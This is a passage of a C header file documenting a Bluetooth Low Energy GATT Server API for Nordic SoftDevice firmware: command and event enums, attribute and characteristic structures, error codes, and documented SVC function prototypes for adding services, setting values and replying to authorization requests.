SD_BLE_GATTS_SERVICE_ADD = BLE_GATTS_SVC_BASE, /**< Add a service. */\r\n SD_BLE_GATTS_INCLUDE_ADD, /**< Add an included service. */\r\n SD_BLE_GATTS_CHARACTERISTIC_ADD, /**< Add a characteristic. */\r\n SD_BLE_GATTS_DESCRIPTOR_ADD, /**< Add a generic attribute. */\r\n SD_BLE_GATTS_VALUE_SET, /**< Set an attribute value. */\r\n SD_BLE_GATTS_VALUE_GET, /**< Get an attribute value. */\r\n SD_BLE_GATTS_HVX, /**< Handle Value Notification or Indication. */\r\n SD_BLE_GATTS_SERVICE_CHANGED, /**< Perform a Service Changed Indication to one or more peers. */\r\n SD_BLE_GATTS_RW_AUTHORIZE_REPLY, /**< Reply to an authorization request for a read or write operation on one or more attributes. */\r\n SD_BLE_GATTS_SYS_ATTR_SET, /**< Set the persistent system attributes for a connection. */\r\n SD_BLE_GATTS_SYS_ATTR_GET, /**< Retrieve the persistent system attributes. */\r\n};\r\n\r\n/**\r\n * @brief GATT Server Event IDs.\r\n */\r\nenum BLE_GATTS_EVTS\r\n{\r\n BLE_GATTS_EVT_WRITE = BLE_GATTS_EVT_BASE, /**< Write operation performed. @ref ble_gatts_evt_write_t */\r\n BLE_GATTS_EVT_RW_AUTHORIZE_REQUEST, /**< Read/Write Authorization request.@ref ble_gatts_evt_rw_authorize_request_t */\r\n BLE_GATTS_EVT_SYS_ATTR_MISSING, /**< A persistent system attribute access is pending, awaiting a sd_ble_gatts_sys_attr_set(). @ref ble_gatts_evt_sys_attr_missing_t */\r\n BLE_GATTS_EVT_HVC, /**< Handle Value Confirmation. @ref ble_gatts_evt_hvc_t */\r\n BLE_GATTS_EVT_SC_CONFIRM, /**< Service Changed Confirmation. No additional event structure applies. */\r\n BLE_GATTS_EVT_TIMEOUT /**< Timeout. @ref ble_gatts_evt_timeout_t */\r\n};\r\n/** @} */\r\n\r\n/** @addtogroup BLE_GATTS_DEFINES Defines\r\n * @{ */\r\n\r\n/** @defgroup BLE_ERRORS_GATTS SVC return values specific to GATTS\r\n * @{ */\r\n#define BLE_ERROR_GATTS_INVALID_ATTR_TYPE (NRF_GATTS_ERR_BASE + 0x000) /**< Invalid attribute type. */\r\n#define BLE_ERROR_GATTS_SYS_ATTR_MISSING (NRF_GATTS_ERR_BASE + 0x001) /**< System Attributes missing. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_ATTR_LENS_MAX Maximum attribute lengths\r\n * @{ */\r\n#define BLE_GATTS_FIX_ATTR_LEN_MAX (510) /**< Maximum length for fixed length Attribute Values. */\r\n#define BLE_GATTS_VAR_ATTR_LEN_MAX (512) /**< Maximum length for variable length Attribute Values. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_SRVC_TYPES GATT Server Service Types\r\n * @{ */\r\n#define BLE_GATTS_SRVC_TYPE_INVALID 0x00 /**< Invalid Service Type. */\r\n#define BLE_GATTS_SRVC_TYPE_PRIMARY 0x01 /**< Primary Service. */\r\n#define BLE_GATTS_SRVC_TYPE_SECONDARY 0x02 /**< Secondary Type. */\r\n/** @} */\r\n\r\n\r\n/** @defgroup BLE_GATTS_ATTR_TYPES GATT Server Attribute Types\r\n * @{ */\r\n#define BLE_GATTS_ATTR_TYPE_INVALID 0x00 /**< Invalid Attribute Type. */\r\n#define BLE_GATTS_ATTR_TYPE_PRIM_SRVC_DECL 0x01 /**< Primary Service Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_SEC_SRVC_DECL 0x02 /**< Secondary Service Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_INC_DECL 0x03 /**< Include Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_CHAR_DECL 0x04 /**< Characteristic Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_CHAR_VAL 0x05 /**< Characteristic Value. */\r\n#define BLE_GATTS_ATTR_TYPE_DESC 0x06 /**< Descriptor. */\r\n#define BLE_GATTS_ATTR_TYPE_OTHER 0x07 /**< Other, non-GATT specific type. */\r\n/** @} */\r\n\r\n\r\n/** @defgroup BLE_GATTS_OPS GATT Server Operations\r\n * @{ */\r\n#define BLE_GATTS_OP_INVALID 0x00 /**< Invalid Operation. */\r\n#define BLE_GATTS_OP_WRITE_REQ 0x01 /**< Write Request. */\r\n#define BLE_GATTS_OP_WRITE_CMD 0x02 /**< Write Command. */\r\n#define BLE_GATTS_OP_SIGN_WRITE_CMD 0x03 /**< Signed Write Command. */\r\n#define BLE_GATTS_OP_PREP_WRITE_REQ 0x04 /**< Prepare Write Request. */\r\n#define BLE_GATTS_OP_EXEC_WRITE_REQ_CANCEL 0x05 /**< Execute Write Request: Cancel all prepared writes. */\r\n#define BLE_GATTS_OP_EXEC_WRITE_REQ_NOW 0x06 /**< Execute Write Request: Immediately execute all prepared writes. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_VLOCS GATT Value Locations\r\n * @{ */\r\n#define BLE_GATTS_VLOC_INVALID 0x00 /**< Invalid Location. */\r\n#define BLE_GATTS_VLOC_STACK 0x01 /**< Attribute Value is located in stack memory, no user memory is required. */\r\n#define BLE_GATTS_VLOC_USER 0x02 /**< Attribute Value is located in user memory. This requires the user to maintain a valid buffer through the lifetime of the attribute, since the stack\r\n will read and write directly to the memory using the pointer provided in the APIs. There are no alignment requirements for the buffer. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_AUTHORIZE_TYPES GATT Server Authorization Types\r\n * @{ */\r\n#define BLE_GATTS_AUTHORIZE_TYPE_INVALID 0x00 /**< Invalid Type. */\r\n#define BLE_GATTS_AUTHORIZE_TYPE_READ 0x01 /**< Authorize a Read Operation. */\r\n#define BLE_GATTS_AUTHORIZE_TYPE_WRITE 0x02 /**< Authorize a Write Request Operation. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_SYS_ATTR_FLAGS System Attribute Flags\r\n * @{ */\r\n#define BLE_GATTS_SYS_ATTR_FLAG_SYS_SRVCS (1 << 0) /**< Restrict system attributes to system services only. */\r\n#define BLE_GATTS_SYS_ATTR_FLAG_USR_SRVCS (1 << 1) /**< Restrict system attributes to user services only. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_ATTR_TAB_SIZE Attribute Table size\r\n * @{\r\n */\r\n#define BLE_GATTS_ATTR_TAB_SIZE_MIN 216 /**< Minimum Attribute Table size */\r\n#define BLE_GATTS_ATTR_TAB_SIZE_DEFAULT 0x0000 /**< Default Attribute Table size (0x700 bytes for this version of the SoftDevice). */\r\n/** @} */\r\n\r\n/** @} */\r\n\r\n/** @addtogroup BLE_GATTS_STRUCTURES Structures\r\n * @{ */\r\n\r\n/**\r\n * @brief BLE GATTS init options\r\n */\r\ntypedef struct\r\n{\r\n uint8_t service_changed:1; /**< Include the Service Changed characteristic in the Attribute Table. */\r\n uint32_t attr_tab_size; /**< Attribute Table size in bytes. The size must be a multiple of 4. @ref BLE_GATTS_ATTR_TAB_SIZE_DEFAULT is used to set the default size. */\r\n} ble_gatts_enable_params_t;\r\n\r\n/**@brief Attribute metadata. */\r\ntypedef struct\r\n{\r\n ble_gap_conn_sec_mode_t read_perm; /**< Read permissions. */\r\n ble_gap_conn_sec_mode_t write_perm; /**< Write permissions. */\r\n uint8_t vlen :1; /**< Variable length attribute. */\r\n uint8_t vloc :2; /**< Value location, see @ref BLE_GATTS_VLOCS.*/\r\n uint8_t rd_auth :1; /**< Read authorization and value will be requested from the application on every read operation. */\r\n uint8_t wr_auth :1; /**< Write authorization will be requested from the application on every Write Request operation (but not Write Command). */\r\n} ble_gatts_attr_md_t;\r\n\r\n\r\n/**@brief GATT Attribute. */\r\ntypedef struct\r\n{\r\n ble_uuid_t *p_uuid; /**< Pointer to the attribute UUID. */\r\n ble_gatts_attr_md_t *p_attr_md; /**< Pointer to the attribute metadata structure. */\r\n uint16_t init_len; /**< Initial attribute value length in bytes. */\r\n uint16_t init_offs; /**< Initial attribute value offset in bytes. If different from zero, the first init_offs bytes of the attribute value will be left uninitialized. */\r\n uint16_t max_len; /**< Maximum attribute value length in bytes, see @ref BLE_GATTS_ATTR_LENS_MAX for maximum values. */\r\n uint8_t* p_value; /**< Pointer to the attribute data. Please note that if the @ref BLE_GATTS_VLOC_USER value location is selected in the attribute metadata, this will have to point to a buffer\r\n that remains valid through the lifetime of the attribute. This excludes usage of automatic variables that may go out of scope or any other temporary location.\r\n The stack may access that memory directly without the application's knowledge. For writable characteristics, this value must not be a location in flash memory.*/\r\n} ble_gatts_attr_t;\r\n\r\n/**@brief GATT Attribute Value. */\r\ntypedef struct\r\n{\r\n uint16_t len; /**< Length in bytes to be written or read. Length in bytes written or read after successful return.*/\r\n uint16_t offset; /**< Attribute value offset. */\r\n uint8_t *p_value; /**< Pointer to where value is stored or will be stored.\r\n If value is stored in user memory, only the attribute length is updated when p_value == NULL.\r\n Set to NULL when reading to obtain the complete length of the attribute value */\r\n} ble_gatts_value_t;\r\n\r\n\r\n/**@brief GATT Attribute Context. */\r\ntypedef struct\r\n{\r\n ble_uuid_t srvc_uuid; /**< Service UUID. */\r\n ble_uuid_t char_uuid; /**< Characteristic UUID if applicable (BLE_UUID_TYPE_UNKNOWN otherwise). */\r\n ble_uuid_t desc_uuid; /**< Descriptor UUID if applicable (BLE_UUID_TYPE_UNKNOWN otherwise). */\r\n uint16_t srvc_handle; /**< Service Handle. */\r\n uint16_t value_handle; /**< Characteristic Value Handle if applicable (BLE_GATT_HANDLE_INVALID otherwise). */\r\n uint8_t type; /**< Attribute Type, see @ref BLE_GATTS_ATTR_TYPES. */\r\n} ble_gatts_attr_context_t;\r\n\r\n\r\n/**@brief GATT Characteristic Presentation Format. */\r\ntypedef struct\r\n{\r\n uint8_t format; /**< Format of the value, see @ref BLE_GATT_CPF_FORMATS. */\r\n int8_t exponent; /**< Exponent for integer data types. */\r\n uint16_t unit; /**< Unit from Bluetooth Assigned Numbers. */\r\n uint8_t name_space; /**< Namespace from Bluetooth Assigned Numbers, see @ref BLE_GATT_CPF_NAMESPACES. */\r\n uint16_t desc; /**< Namespace description from Bluetooth Assigned Numbers, see @ref BLE_GATT_CPF_NAMESPACES. */\r\n} ble_gatts_char_pf_t;\r\n\r\n\r\n/**@brief GATT Characteristic metadata. */\r\ntypedef struct\r\n{\r\n ble_gatt_char_props_t char_props; /**< Characteristic Properties. */\r\n ble_gatt_char_ext_props_t char_ext_props; /**< Characteristic Extended Properties. */\r\n uint8_t *p_char_user_desc; /**< Pointer to a UTF-8 encoded string (non-NULL terminated), NULL if the descriptor is not required. */\r\n uint16_t char_user_desc_max_size; /**< The maximum size in bytes of the user description descriptor. */\r\n uint16_t char_user_desc_size; /**< The size of the user description, must be smaller or equal to char_user_desc_max_size. */\r\n ble_gatts_char_pf_t* p_char_pf; /**< Pointer to a presentation format structure or NULL if the CPF descriptor is not required. */\r\n ble_gatts_attr_md_t* p_user_desc_md; /**< Attribute metadata for the User Description descriptor, or NULL for default values. */\r\n ble_gatts_attr_md_t* p_cccd_md; /**< Attribute metadata for the Client Characteristic Configuration Descriptor, or NULL for default values. */\r\n ble_gatts_attr_md_t* p_sccd_md; /**< Attribute metadata for the Server Characteristic Configuration Descriptor, or NULL for default values. */\r\n} ble_gatts_char_md_t;\r\n\r\n\r\n/**@brief GATT Characteristic Definition Handles. */\r\ntypedef struct\r\n{\r\n uint16_t value_handle; /**< Handle to the characteristic value. */\r\n uint16_t user_desc_handle; /**< Handle to the User Description descriptor, or @ref BLE_GATT_HANDLE_INVALID if not present. */\r\n uint16_t cccd_handle; /**< Handle to the Client Characteristic Configuration Descriptor, or @ref BLE_GATT_HANDLE_INVALID if not present. */\r\n uint16_t sccd_handle; /**< Handle to the Server Characteristic Configuration Descriptor, or @ref BLE_GATT_HANDLE_INVALID if not present. */\r\n} ble_gatts_char_handles_t;\r\n\r\n\r\n/**@brief GATT HVx parameters. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Characteristic Value Handle. */\r\n uint8_t type; /**< Indication or Notification, see @ref BLE_GATT_HVX_TYPES. */\r\n uint16_t offset; /**< Offset within the attribute value. */\r\n uint16_t *p_len; /**< Length in bytes to be written, length in bytes written after successful return. */\r\n uint8_t *p_data; /**< Actual data content, use NULL to use the current attribute value. */\r\n} ble_gatts_hvx_params_t;\r\n\r\n/**@brief GATT Read Authorization parameters. */\r\ntypedef struct\r\n{\r\n uint16_t gatt_status; /**< GATT status code for the operation, see @ref BLE_GATT_STATUS_CODES. */\r\n uint8_t update : 1; /**< If set, data supplied in p_data will be used in the ATT response. */\r\n uint16_t offset; /**< Offset of the attribute value being updated. */\r\n uint16_t len; /**< Length in bytes of the value in p_data pointer, see @ref BLE_GATTS_ATTR_LENS_MAX. */\r\n uint8_t *p_data; /**< Pointer to new value used to update the attribute value. */\r\n} ble_gatts_read_authorize_params_t;\r\n\r\n/**@brief GATT Write Authorization parameters. */\r\ntypedef struct\r\n{\r\n uint16_t gatt_status; /**< GATT status code for the operation, see @ref BLE_GATT_STATUS_CODES. */\r\n} ble_gatts_write_authorize_params_t;\r\n\r\n/**@brief GATT Read or Write Authorize Reply parameters. */\r\ntypedef struct\r\n{\r\n uint8_t type; /**< Type of authorize operation, see @ref BLE_GATTS_AUTHORIZE_TYPES. */\r\n union {\r\n ble_gatts_read_authorize_params_t read; /**< Read authorization parameters. */\r\n ble_gatts_write_authorize_params_t write; /**< Write authorization parameters. */\r\n } params; /**< Reply Parameters. */\r\n} ble_gatts_rw_authorize_reply_params_t;\r\n\r\n\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_WRITE. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Attribute Handle. */\r\n uint8_t op; /**< Type of write operation, see @ref BLE_GATTS_OPS. */\r\n ble_gatts_attr_context_t context; /**< Attribute Context. */\r\n uint16_t offset; /**< Offset for the write operation. */\r\n uint16_t len; /**< Length of the received data. */\r\n uint8_t data[1]; /**< Received data, variable length. */\r\n} ble_gatts_evt_write_t;\r\n\r\n/**@brief Event substructure for authorized read requests, see @ref ble_gatts_evt_rw_authorize_request_t. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Attribute Handle. */\r\n ble_gatts_attr_context_t context; /**< Attribute Context. */\r\n uint16_t offset; /**< Offset for the read operation. */\r\n} ble_gatts_evt_read_t;\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_RW_AUTHORIZE_REQUEST. */\r\ntypedef struct\r\n{\r\n uint8_t type; /**< Type of authorize operation, see @ref BLE_GATTS_AUTHORIZE_TYPES. */\r\n union {\r\n ble_gatts_evt_read_t read; /**< Attribute Read Parameters. */\r\n ble_gatts_evt_write_t write; /**< Attribute Write Parameters. */\r\n } request; /**< Request Parameters. */\r\n} ble_gatts_evt_rw_authorize_request_t;\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_SYS_ATTR_MISSING. */\r\ntypedef struct\r\n{\r\n uint8_t hint; /**< Hint (currently unused). */\r\n} ble_gatts_evt_sys_attr_missing_t;\r\n\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_HVC. */\r\ntypedef struct\r\n{\r\n uint16_t handle; /**< Attribute Handle. */\r\n} ble_gatts_evt_hvc_t;\r\n\r\n/**@brief Event structure for @ref BLE_GATTS_EVT_TIMEOUT. */\r\ntypedef struct\r\n{\r\n uint8_t src; /**< Timeout source, see @ref BLE_GATT_TIMEOUT_SOURCES. */\r\n} ble_gatts_evt_timeout_t;\r\n\r\n\r\n/**@brief GATT Server event callback event structure. */\r\ntypedef struct\r\n{\r\n uint16_t conn_handle; /**< Connection Handle on which the event occurred. */\r\n union\r\n {\r\n ble_gatts_evt_write_t write; /**< Write Event Parameters. */\r\n ble_gatts_evt_rw_authorize_request_t authorize_request; /**< Read or Write Authorize Request Parameters. */\r\n ble_gatts_evt_sys_attr_missing_t sys_attr_missing; /**< System attributes missing. */\r\n ble_gatts_evt_hvc_t hvc; /**< Handle Value Confirmation Event Parameters. */\r\n ble_gatts_evt_timeout_t timeout; /**< Timeout Event. */\r\n } params; /**< Event Parameters. */\r\n} ble_gatts_evt_t;\r\n\r\n/** @} */\r\n\r\n/** @addtogroup BLE_GATTS_FUNCTIONS Functions\r\n * @{ */\r\n\r\n/**@brief Add a service declaration to the Attribute Table.\r\n *\r\n * @param[in] type Toggles between primary and secondary services, see @ref BLE_GATTS_SRVC_TYPES.\r\n * @param[in] p_uuid Pointer to service UUID.\r\n * @param[out] p_handle Pointer to a 16-bit word where the assigned handle will be stored.\r\n *\r\n * @note Secondary Services are only relevant in the context of the entity that references them, it is therefore forbidden to\r\n * add a secondary service declaration that is not referenced by another service later in the Attribute Table.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added a service declaration.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, Vendor Specific UUIDs need to be present in the table.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, certain UUIDs are reserved for the stack.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n */\r\nSVCALL(SD_BLE_GATTS_SERVICE_ADD, uint32_t, sd_ble_gatts_service_add(uint8_t type, ble_uuid_t const *p_uuid, uint16_t *p_handle));\r\n\r\n\r\n/**@brief Add an include declaration to the Attribute Table.\r\n *\r\n * @note It is currently only possible to add an include declaration to the last added service (i.e. only sequential population is supported at this time).\r\n *\r\n * @note The included service must already be present in the Attribute Table prior to this call.\r\n *\r\n * @param[in] service_handle Handle of the service where the included service is to be placed, if @ref BLE_GATT_HANDLE_INVALID is used, it will be placed sequentially.\r\n * @param[in] inc_srvc_handle Handle of the included service.\r\n * @param[out] p_include_handle Pointer to a 16-bit word where the assigned handle will be stored.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added an include declaration.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, handle values need to match previously added services.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, self inclusions are not allowed.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n */\r\nSVCALL(SD_BLE_GATTS_INCLUDE_ADD, uint32_t, sd_ble_gatts_include_add(uint16_t service_handle, uint16_t inc_srvc_handle, uint16_t *p_include_handle));\r\n\r\n\r\n/**@brief Add a characteristic declaration, a characteristic value declaration and optional characteristic descriptor declarations to the Attribute Table.\r\n *\r\n * @note It is currently only possible to add a characteristic to the last added service (i.e. only sequential population is supported at this time).\r\n *\r\n * @note Several restrictions apply to the parameters, such as matching permissions between the user description descriptor and the writeable auxiliaries bits,\r\n * readable (no security) and writeable (selectable) CCCDs and SCCDs and valid presentation format values.\r\n *\r\n * @note If no metadata is provided for the optional descriptors, their permissions will be derived from the characteristic permissions.\r\n *\r\n * @param[in] service_handle Handle of the service where the characteristic is to be placed, if @ref BLE_GATT_HANDLE_INVALID is used, it will be placed sequentially.\r\n * @param[in] p_char_md Characteristic metadata.\r\n * @param[in] p_attr_char_value Pointer to the attribute structure corresponding to the characteristic value.\r\n * @param[out] p_handles Pointer to the structure where the assigned handles will be stored.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added a characteristic.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, service handle, Vendor Specific UUIDs, lengths, and permissions need to adhere to the constraints.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation, a service context is required.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, certain UUIDs are reserved for the stack.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied, attribute lengths are restricted by @ref BLE_GATTS_ATTR_LENS_MAX.\r\n */\r\nSVCALL(SD_BLE_GATTS_CHARACTERISTIC_ADD, uint32_t, sd_ble_gatts_characteristic_add(uint16_t service_handle, ble_gatts_char_md_t const *p_char_md, ble_gatts_attr_t const *p_attr_char_value, ble_gatts_char_handles_t *p_handles));\r\n\r\n\r\n/**@brief Add a descriptor to the Attribute Table.\r\n *\r\n * @note It is currently only possible to add a descriptor to the last added characteristic (i.e. only sequential population is supported at this time).\r\n *\r\n * @param[in] char_handle Handle of the characteristic where the descriptor is to be placed, if @ref BLE_GATT_HANDLE_INVALID is used, it will be placed sequentially.\r\n * @param[in] p_attr Pointer to the attribute structure.\r\n * @param[out] p_handle Pointer to a 16-bit word where the assigned handle will be stored.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully added a descriptor.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied, characteristic handle, Vendor Specific UUIDs, lengths, and permissions need to adhere to the constraints.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation, a characteristic context is required.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden value supplied, certain UUIDs are reserved for the stack.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied, attribute lengths are restricted by @ref BLE_GATTS_ATTR_LENS_MAX.\r\n */\r\nSVCALL(SD_BLE_GATTS_DESCRIPTOR_ADD, uint32_t, sd_ble_gatts_descriptor_add(uint16_t char_handle, ble_gatts_attr_t const *p_attr, uint16_t *p_handle));\r\n\r\n/**@brief Set the value of a given attribute.\r\n *\r\n * @param[in] conn_handle Connection handle. If the value does not belong to a system attribute then @ref BLE_CONN_HANDLE_INVALID can be used.\r\n * @param[in] handle Attribute handle.\r\n * @param[in,out] p_value Attribute value information.\r\n *\r\n * @note Values other than system attributes can be set at any time, regardless of wheter any active connections exist.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully set the value of the attribute.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n * @retval ::NRF_ERROR_FORBIDDEN Forbidden handle supplied, certain attributes are not modifiable by the application.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied, attribute lengths are restricted by @ref BLE_GATTS_ATTR_LENS_MAX.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid connection handle supplied.\r\n * @retval ::BLE_ERROR_GATTS_INVALID_ATTR_TYPE @ref BLE_CONN_HANDLE_INVALID supplied on a system attribute.\r\n */\r\n#ifndef __RFduino__\r\nSVCALL(SD_BLE_GATTS_VALUE_SET, uint32_t, sd_ble_gatts_value_set(uint16_t conn_handle, uint16_t handle, ble_gatts_value_t *p_value));\r\n#else\r\nSVCALL(SD_BLE_GATTS_VALUE_SET, uint32_t, sd_ble_gatts_value_set(uint16_t handle, uint16_t offset, uint16_t* const p_len, uint8_t const * const p_value));\r\n#endif\r\n\r\n/**@brief Get the value of a given attribute.\r\n *\r\n * @param[in] conn_handle Connection handle. If the value does not belong to a system attribute then @ref BLE_CONN_HANDLE_INVALID can be used.\r\n * @param[in] handle Attribute handle.\r\n * @param[in,out] p_value Attribute value information.\r\n *\r\n * @note If the attribute value is longer than the size of the supplied buffer,\r\n * p_len will return the total attribute value length (excluding offset),\r\n * and not the number of bytes actually returned in p_data.\r\n * The application may use this information to allocate a suitable buffer size.\r\n *\r\n * @note When retrieving system attribute values with this function, the connection handle\r\n * may refer to an already disconnected connection. Refer to the documentation of\r\n * @ref sd_ble_gatts_sys_attr_get for further information.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully retrieved the value of the attribute.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid connection handle supplied.\r\n * @retval ::BLE_ERROR_GATTS_INVALID_ATTR_TYPE @ref BLE_CONN_HANDLE_INVALID supplied on a system attribute.\r\n */\r\nSVCALL(SD_BLE_GATTS_VALUE_GET, uint32_t, sd_ble_gatts_value_get(uint16_t conn_handle, uint16_t handle, ble_gatts_value_t *p_value));\r\n\r\n/**@brief Notify or Indicate an attribute value.\r\n *\r\n * @details This function checks for the relevant Client Characteristic Configuration descriptor value to verify that the relevant operation\r\n * (notification or indication) has been enabled by the client. It is also able to update the attribute value before issuing the PDU, so that\r\n * the application can atomically perform a value update and a server initiated transaction with a single API call.\r\n * If the application chooses to indicate an attribute value, a @ref BLE_GATTS_EVT_HVC event will be issued as soon as the confirmation arrives from\r\n * the peer.\r\n *\r\n * @note The local attribute value may be updated even if an outgoing packet is not sent to the peer due to an error during execution.\r\n * When receiveing the error codes @ref NRF_ERROR_INVALID_STATE, @ref NRF_ERROR_BUSY, @ref BLE_ERROR_GATTS_SYS_ATTR_MISSING and\r\n * @ref BLE_ERROR_NO_TX_BUFFERS the Attribute Table has been updated.\r\n * The caller can check whether the value has been updated by looking at the contents of *(p_hvx_params->p_len).\r\n *\r\n * @note It is important to note that a notification will consume an application buffer, and will therefore\r\n * generate a @ref BLE_EVT_TX_COMPLETE event when the packet has been transmitted. An indication on the other hand will use the\r\n * standard server internal buffer and thus will only generate a @ref BLE_GATTS_EVT_HVC event as soon as the confirmation\r\n * has been received from the peer. Please see the documentation of @ref sd_ble_tx_buffer_count_get for more details.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] p_hvx_params Pointer to an HVx parameters structure. If the p_data member contains a non-NULL pointer the attribute value will be updated with\r\n * the contents pointed by it before sending the notification or indication.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully queued a notification or indication for transmission, and optionally updated the attribute value.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State or notifications and/or indications not enabled in the CCCD.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied.\r\n * @retval ::BLE_ERROR_INVALID_ATTR_HANDLE Invalid attribute handle(s) supplied. Only attributes added directly by the application are available to notify and indicate.\r\n * @retval ::BLE_ERROR_GATTS_INVALID_ATTR_TYPE Invalid attribute type(s) supplied, only characteristic values may be notified and indicated.\r\n * @retval ::NRF_ERROR_NOT_FOUND Attribute not found.\r\n * @retval ::NRF_ERROR_DATA_SIZE Invalid data size(s) supplied.\r\n * @retval ::NRF_ERROR_BUSY Procedure already in progress.\r\n * @retval ::BLE_ERROR_GATTS_SYS_ATTR_MISSING System attributes missing, use @ref sd_ble_gatts_sys_attr_set to set them to a known value.\r\n * @retval ::BLE_ERROR_NO_TX_BUFFERS There are no available buffers to send the data, applies only to notifications.\r\n */\r\nSVCALL(SD_BLE_GATTS_HVX, uint32_t, sd_ble_gatts_hvx(uint16_t conn_handle, ble_gatts_hvx_params_t const *p_hvx_params));\r\n\r\n/**@brief Indicate the Service Changed attribute value.\r\n *\r\n * @details This call will send a Handle Value Indication to one or more peers connected to inform them that the Attribute\r\n * Table layout has changed. As soon as the peer has confirmed the indication, a @ref BLE_GATTS_EVT_SC_CONFIRM event will\r\n * be issued.\r\n *\r\n * @note Some of the restrictions and limitations that apply to @ref sd_ble_gatts_hvx also apply here.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] start_handle Start of affected attribute handle range.\r\n * @param[in] end_handle End of affected attribute handle range.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully queued the Service Changed indication for transmission.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State or notifications and/or indications not enabled in the CCCD.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Invalid parameter(s) supplied.\r\n * @retval ::BLE_ERROR_INVALID_ATTR_HANDLE Invalid attribute handle(s) supplied, handles must be in the range populated by the application.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid state to perform operation, notifications or indications must be enabled in the CCCD.\r\n * @retval ::NRF_ERROR_BUSY Procedure already in progress.\r\n * @retval ::BLE_ERROR_GATTS_SYS_ATTR_MISSING System attributes missing, use @ref sd_ble_gatts_sys_attr_set to set them to a known value.\r\n */\r\nSVCALL(SD_BLE_GATTS_SERVICE_CHANGED, uint32_t, sd_ble_gatts_service_changed(uint16_t conn_handle, uint16_t start_handle, uint16_t end_handle));\r\n\r\n/**@brief Respond to a Read/Write authorization request.\r\n *\r\n * @note This call should only be used as a response to a @ref BLE_GATTS_EVT_RW_AUTHORIZE_REQUEST event issued to the application.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] p_rw_authorize_reply_params Pointer to a structure with the attribute provided by the application.\r\n *\r\n * @retval ::NRF_SUCCESS Successfully queued a response to the peer, and in the case of a write operation, Attribute Table updated.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State or no authorization request pending.\r\n * @retval ::NRF_ERROR_INVALID_PARAM Authorization op invalid,\r\n * or for Read Authorization reply: requested handles not replied with,\r\n * or for Write Authorization reply: handle supplied does not match requested handle.\r\n * @retval ::NRF_ERROR_BUSY The stack is busy. Retry at later time.\r\n 